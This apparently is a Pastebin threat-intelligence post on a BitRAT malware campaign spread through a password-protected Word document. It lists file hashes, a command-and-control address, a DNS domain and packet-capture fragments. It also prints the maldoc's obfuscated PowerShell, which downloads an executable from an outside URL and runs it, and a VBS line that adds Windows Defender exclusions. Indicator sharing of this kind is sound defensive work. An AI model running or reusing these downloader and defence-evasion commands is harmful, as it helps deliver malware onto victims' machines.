Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- THREAT IDENTIFICATION: BITRAT
- SUBJECTS OBSERVED
- Separate Remittance Notice : Paper Document No: 341930290
- SENDERS OBSERVED
- DOCUMENT FILE HASHES
- Remit_Scan 8.10.21.doc
- 3ad29bdfead859c703ec80cca76409e5
- Password
- 081021
- POWERSHELL FROM MALDOC
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v78df0=($we22='(New-Obje' + 'ct Net.We'; $b4df='bCl' + 'ient).Downlo'; $c3='adFile(''http://augustair.com/Resources/eft/edi.exe'',$env:temp+''\mail.exe'')';$TC=IEX ($we22,$b4df,$c3 -Join '');start-process($env:temp+ '\mail.exe')) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX
- PAYLOAD DOWNLOAD URL
- http://augustair.com/Resources/eft/edi.exe
- PAYLOAD FILE HASH
- edi.exe
- 537d313f3dfe75d7a9d4f36f80cce049
- VBS FILE HASH
- _Kthavoimchnr.vbs
- dfeff1f15472010a44f33a0d9344cfd9
- VBS FILE CONTENTS
- CreateObject("WScript.Shell").Run "powershell Set-MpPreference -ExclusionPath C:\,'C:\Users\analyst\AppData\Roaming\outlook.exe'", 0, False
- BITRAT C2
- 23.94.54.231:3050
- SUPPORTING EVIDENCE
- https://urlhaus.abuse.ch/url/1506968/
- FROM THE PACKET CAPTURE
- ....q...m..u..|../...BdV.o......#ZZ..xz?.............k.g.9.3.....=.<.5./.....(.#...........
- ..... .
- ......................U...Q..a...>....N..V...{...:R._,...{.
- 5 .C...ak.(......<.%.....%q...-..~.... ...................0...0............RK.7.M.X.P.o..0
- . *.H..
- .....0.1.0
- ..U....BitRAT0 .
- 210727000000Z..21200727000000Z0.1.0
- ..U....BitRAT0.."0
- . *.H..
- ..........0..
- ......
- I also saw several Ping packets to 8.8.8.8
- Also DNS Queries for eter102.dvrlists.com
- STRINGS IN THE MAIL.EXE PROCESS
- # Netscape HTTP Cookie File
- # https://curl.haxx.se/docs/http-cookies.html
- # This file was generated by libcurl! Edit at your own risk.
- GammaCalibrator
Add Comment
Please, Sign In to add comment
